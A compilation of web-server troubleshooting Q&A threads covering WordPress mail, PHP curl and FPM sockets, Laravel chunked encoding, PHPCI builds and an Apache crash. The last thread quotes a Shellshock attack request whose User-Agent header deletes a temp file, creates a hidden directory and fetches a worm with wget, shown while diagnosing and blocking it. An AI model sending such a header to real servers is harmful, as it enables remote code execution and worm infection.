I can't send user mail on WordPress - php

I've almost given up figuring out what is wrong.
I've set up a web server using nginx, but I can't send user mail from WordPress.
When I create a user or reset a password, WordPress just stops.
The environment is below:
Ubuntu 16.04.1
Nginx 1.12.1
PHP 7.0.1
FPM/FastCGI
postfix 3.1.0
(I can send mail with the 'mail' command.)
WordPress 4.4.2
The nginx error log is below:
PHP message: PHP Fatal error: require_once(): Failed opening required
'/var/www/html/cms/wp-includes/class-phpmailer.php'
(include_path='.:/usr/share/php') in
/var/www/html/cms/wp-includes/pluggable.php on line 275" while reading
response header from upstream, client: {global_ip}, server: {domain},
request: "POST /cms/wp-admin/user-edit.php HTTP/1.1", upstream:
"fastcgi://unix:/var/run/php/php7.0-fpm.sock:", host: "{host_name}",
referrer:
"/cms/wp-admin/user-edit.php?user_id=2&wp_http_referer=%2Fcms%2Fwp-admin%2Fusers.php"
Any help or hint?

Thanks everyone. It was solved.
When I installed WordPress, I used "sudo apt-get install wordpress" and then copied the files to the html root.
I don't know exactly why (I might not have used the 'cp' command with sudo), but
'class-phpmailer.php' and 'class-smtp.php' were not copied properly.
So whenever the system called the wp_mail() function, WordPress stopped.
That's all. Thanks a lot!
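
A quick way to confirm this kind of breakage, as a minimal sketch (the script name is made up; the file list reflects what wp_mail() requires in WordPress 4.4, so adjust for other versions):

<?php
// check-mail-includes.php - hypothetical diagnostic; run it from the
// WordPress root. It verifies that the files wp_mail() requires are
// actually present and readable.
$files = [
    'wp-includes/class-phpmailer.php',
    'wp-includes/class-smtp.php',
];

foreach ($files as $file) {
    $ok = is_readable(__DIR__ . '/' . $file);
    echo $file . ': ' . ($ok ? 'OK' : 'MISSING or unreadable') . PHP_EOL;
}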

Related

How to get PHP 8.1 to recognize curl_init?

I know this may seem similar to many questions already out there, but I've read dozens and I am still experiencing the same issue. My code works fine on my local machine, and my Raspberry Pi was configured by the exact same setup script, but it doesn't work on the Pi.
My OS is Raspbian 10 (Buster) with kernel version 5.10.103-v7l+. I am running PHP 8.1, along with the other packages in the following command: sudo apt install -y php8.1-common php8.1-cli php8.1-fpm php8.1-xml php8.1-curl
php -m lists curl, and both php -i and phpinfo() show that cURL is installed and enabled:
cURL support => enabled
cURL Information => 7.64.0
I know cURL is installed and enabled, so how do I get my PHP to recognize and use the package? It works perfectly on my local Linux box, but on the Pi it just doesn't. I have restarted my server and my entire machine, and neither made a difference. I have run sudo apt update && sudo apt upgrade and everything is at the most recent version.
The 'problematic' snippet of code on my server is the following:
require "vendor/autoload.php";
use Symfony\Component\Panther\Client;
$options = [
"--headless",
"--window-size=1200,1100",
"--no-sandbox",
"--disable-gpu",
"--disable-dev-shm-usage",
];
$query = urlencode($_GET["q"]);
$url ="/search?hl=en&tbo=d&site=&source=hp&q=".$query;
$client = Client::createChromeClient("/usr/lib/chromium-browser/chromedriver", $options, [], "http://www.google.com");
$client->request("GET", $url);
My full error log is:
*168 FastCGI sent in stderr: "PHP message: PHP Fatal error: Uncaught Error: Call to undefined function Facebook\WebDriver\Remote\curl_init() in /var/lib/jenkins/workspace/url-here.com/vendor/php-webdriver/webdriver/lib/Remote/HttpCommandExecutor.php:190
Stack trace:
#0 /var/lib/jenkins/workspace/url-here.com/vendor/php-webdriver/webdriver/lib/Remote/RemoteWebDriver.php(100): Facebook\WebDriver\Remote\HttpCommandExecutor->__construct()
#1 /var/lib/jenkins/workspace/url-here.com/vendor/symfony/panther/src/ProcessManager/ChromeManager.php(75): Facebook\WebDriver\Remote\RemoteWebDriver::create()
#2 /var/lib/jenkins/workspace/url-here.com/vendor/symfony/panther/src/Client.php(117): Symfony\Component\Panther\ProcessManager\ChromeManager->start()
#3 /var/lib/jenkins/workspace/url-here.com/vendor/symfony/panther/src/Client.php(521): Symfony\Component\Panther\Client->start()
#4 /var/lib/jenkins/workspace/url-here.com/vendor/symfony/panther/src/Client.php(273): Symfony\Component\Panther\Client->get()
#5 /var/lib/jenkins/workspace" while reading response header from upstream, client: 96.244.127.121, server: url-here.com, request: "GET /googleSearch.php?q=test HTTP/1.1", upstream: "fastcgi://unix:/run/php/php8.0-fpm.sock:", host: "url-here.com", referrer: "https://url-here.com/apps/browser.html"
Any and all help would be appreciated; I've been struggling with this one for a while. I would just avoid using curl_init() if I could, but unfortunately, as you can see, the function is called in a library that my project depends on.
This line from the error log indicates what the problem most likely is:
#5 /var/lib/jenkins/workspace" while reading response header from upstream, client: 96.244.127.121, server: url-here.com, request: "GET /googleSearch.php?q=test HTTP/1.1", upstream: "fastcgi://unix:/run/php/php8.0-fpm.sock:", host: "url-here.com", referrer: "https://url-here.com/apps/browser.html"
The upstream in that log is php8.0-fpm.sock: you've got PHP 8.0 serving the request, but you've installed cURL for PHP 8.1. You need to check your FPM or server configuration.
I think you're using Nginx. If that's correct, you'll want to look in:
/etc/nginx/sites-available to check which socket each site uses
/etc/php/VERSION/fpm/pool.d to check which sockets are available
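
As a minimal sketch (the file name and exact paths here are assumptions, not taken from the question), the fix would be pointing fastcgi_pass at the 8.1 socket in the site's config:

# /etc/nginx/sites-available/url-here.com (hypothetical)
location ~ \.php$ {
    include snippets/fastcgi-php.conf;
    # was: fastcgi_pass unix:/run/php/php8.0-fpm.sock;
    fastcgi_pass unix:/run/php/php8.1-fpm.sock;
}

Then reload Nginx (sudo systemctl reload nginx) and retry the request.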

Sometimes error appears net::ERR_INCOMPLETE_CHUNKED_ENCODING [duplicate]

This only happens on Google Chrome and Chromium with a fresh install of Laravel.
The page shows blank and in the console it says:
(failed) net::ERR_INCOMPLETE_CHUNKED_ENCODING
Instead of the default hello view, which says “You have arrived.”
My server is Debian Wheezy with ISPConfig, Apache 2.2 and PHP 5.4
Does anybody know how I can fix this?
Had the same problem on an Ubuntu 14.04 Vagrant box running nginx. The site is a Laravel 5 app that one day surprisingly started throwing these errors.
After reading this comment:
https://github.com/barryvdh/laravel-debugbar/issues/262#issuecomment-74385850
I've checked my /var/log/nginx/vagrant.com-error.log.1 and saw:
[crit] 1020#0: *774 open() "/var/lib/nginx/fastcgi/3/03/0000000033" failed (13: Permission denied) while reading upstream, client: 192.168.56.1, server: 192.168.56.102.xip.io, request: "GET /_debugbar/assets/javascript?1423122680 HTTP/1.1", upstream: "fastcgi://127.0.0.1:9000", host: "my-host", referrer: "http://url/that/fails"
Double-checked my Vagrant box's nginx lib directory permissions with ll /var/lib/:
drwxr-xr-x 7 root root 4096 feb 9 11:28 nginx/
... where nginx internally runs as the www-data user: ll /var/lib/nginx/
drwx------ 12 www-data root 4096 may 5 13:32 fastcgi/
So I ran:
chown -R www-data:www-data /var/lib/nginx
And the error in Chrome disappeared.
Just posting the solution here for visibility, even though all the credit should go to the linked original comment.
I had the exact same problem that you have. I found a workaround in this forum thread:
http://laravel.io/forum/02-08-2014-another-problem-only-with-chrome
The code used by the person who provided the workaround: http://laravel.io/bin/eyyDj#4,7
The gist of it is to tell Chrome up front how much data to expect for every response, so it doesn't have to chunk the data.
I'm seeing reports that upgrading to PHP 5.5 also fixes this problem, but not all of us can have that kind of control over our servers.
Edit: It looks as if blindly applying this workaround causes errors on redirects. This is the code that I'm now using:
App::after(function($request, $response) {
    // Fixes a strange issue with Chrome. Should theoretically be removable
    // after upgrading PHP from 5.4 to 5.5.
    if ($response instanceof Illuminate\Http\Response) {
        $response->header('Content-Length', strlen($response->getOriginalContent()));
    }
});
Note that JSON responses are a separate type and may still have the chunking issue, so this solution may need to evolve somewhat to accommodate that.
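
One way that evolution could look, as a sketch of my own (not from the linked thread): the base Symfony response exposes getContent() and the headers bag, which covers JsonResponse and also sidesteps the redirect errors that getOriginalContent() caused.

App::after(function($request, $response) {
    // getContent() exists on every Symfony response type (HTML, JSON,
    // redirect), unlike getOriginalContent(), so one branch covers all.
    // It returns false for streamed responses, so skip those.
    $content = $response->getContent();

    if ($content !== false && ! $response->headers->has('Content-Length')) {
        $response->headers->set('Content-Length', strlen($content));
    }
});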

Build in PHPCI takes forever

I'm setting up Continuous Integration, and I'm wondering if everything should take so damn long.
My build has been running for over a day now and still isn't finished.
It's a normal Laravel app with around 20 controllers, so some build time is expected, but over a day?
My config is fairly simple in my opinion:
build_settings:
    ignore:
        - "vendor"

setup:
    composer:
        action: "install"

test:
    php_mess_detector:
        allow_failures: true
    php_code_sniffer:
        standard: "PSR2"
    php_cpd:
        allow_failures: true
    php_docblock_checker:
        allowed_warnings: 10
        skip_classes: true
    php_loc:
        directory: "src"
No errors, just the (by now) pesky "Pending" status.
When I check the logs, I get this error:
2016/01/28 08:01:32 [error] 6702#0: *4 FastCGI sent in stderr: "PHP message: PHP Fatal error: Class 'PHPCI\Controller' not found in /var/www/vendor/block8/b8framework/b8/Application.php on line 93" while reading response header from upstream, client: someipaddress, server: green.somedomain.com, request: "GET /assets/js/plugins/datepicker/locales/bootstrap-datepicker.en.js HTTP/1.1", upstream: "fastcgi://unix:/var/run/php5-fpm.sock:", host: "green.somedomain.com", referrer: "http://green.somedomain.com/build/view/5"
I ran composer update / install, and I also added the following rule to the nginx configuration:
fastcgi_param SCRIPT_NAME index.php;
My question is: is this normal? Is my config good? Am I forgetting something?
You haven't set up the build runner that PHPCI needs. The web interface merely creates the build and displays the results; you need to run the command-line tool to actually run the builds.
There are three ways to set this up (a sample cron entry follows the list):
1. (New in 1.7 beta) PHPCI worker with beanstalkd:
   - Install beanstalkd
   - Use supervisord (or similar) to keep /path/to/phpci/console phpci:worker running
2. (Recommended for 1.6 and below) PHPCI daemon: https://www.phptesting.org/wiki/Run-Builds-Using-a-Daemon
3. (Fallback option) Cron: https://www.phptesting.org/wiki/Run-Builds-Using-Cron
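
For the cron option, a minimal sketch of the crontab entry (the console path and the exact command are assumptions on my part; the linked wiki page has the canonical form):

# Hypothetical crontab line: poll for and run pending builds every minute.
* * * * * /usr/bin/php /path/to/phpci/console phpci:run-builds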

Apache http server has stopped working

Hi Friends,
I am using the AMPPS server with PHP 5.3.29 on Windows Server Datacenter.
Unfortunately, I am getting the following prompt on the server, and my site is down.
Prompt title:
Microsoft Windows
Prompt message:
Apache HTTP server has stopped working.
A problem caused the program to stop working correctly. Windows will close the program and notify you if a solution is available.
Trace:
When I traced the error and access logs, I found the following entries as the cause.
In Apache access log:
202.175.83.36 - - [10/Dec/2014:05:58:50 -0500] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 1335
217.248.177.30 - - [10/Dec/2014:06:11:24 -0500] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 1335
209.153.244.6 - - [10/Dec/2014:07:09:17 -0500] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 1335
81.214.132.245 - - [10/Dec/2014:07:25:04 -0500] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 1335
In Apache error log:
[Wed Dec 10 07:25:04.401073 2014] [cgi:error] [pid 2908:tid 1168] [client 81.214.132.245:36246] script not found or unable to stat: D:/Program Files/Ampps/www/cgi-bin/authLogin.cgi
Please help me.
There is a web bot trying to gain access so it can wget and execute something like S0.sh, which I imagine is a worm, so the download server is compromised.
I'd like a copy of S0.sh; if you happen to get one, give it to exploit-db or somewhere similar.
The clever request is:
GET /cgi-bin/authLogin.cgi HTTP/1.1
Host: 127.0.0.1
User-Agent: () { :; }; /bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../php && /usr/bin/wget
The "() { :; };" in the User-Agent is the Shellshock trigger: when a vulnerable Bash exports that header as an environment variable, it executes the commands that follow. The file is executed following download.
I suppose there's something about HDB_DATA, which I don't even have.
"Information is Paramount!"
If you try to open this file, what happens?
D:/Program Files/Ampps/www/cgi-bin/authLogin.cgi
The log indicates that the file does not exist: both the 404 status and the "script not found" message say so.
Finally, I denied those clients access to the cgi-bin directory.
I created a .htaccess file in the cgi-bin directory and added the following line to it:
Deny from all
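
A minimal sketch of that .htaccess (the [cgi:error] log format above suggests Apache 2.4, where the old Allow/Deny directives need mod_access_compat; the 2.4-native directive is included as a comment):

# D:/Program Files/Ampps/www/cgi-bin/.htaccess
# Block all clients from anything under cgi-bin (2.2 / mod_access_compat syntax).
Order deny,allow
Deny from all
# Apache 2.4 native equivalent:
# Require all denied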
I don't think authLogin.cgi itself really matters, other than that it might allow someone to execute code. The problem is that the attacker tries to (or successfully does) remove /tmp/S0.sh, make a php directory in the share folder, and then run wget:
/bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../php && /usr/bin/wget
Here is what came up after all that time of wondering:
http://jrnerqbbzrq.blogspot.com/2014/12/a-little-shellshock-fun.html
"S0.sh consists of two main parts ... the first part does the initial setup and downloads additional programs, and then the second part installs the worm and executes some additional commands."
So it was a real treat catching this in action, and initially no one knew to call it Shellshock. There is a copy of S0.sh there, and you can see it's a worm, which I presumed was the case.
From what I read, the worm just scans the IP space looking for anything listening on port 8080.

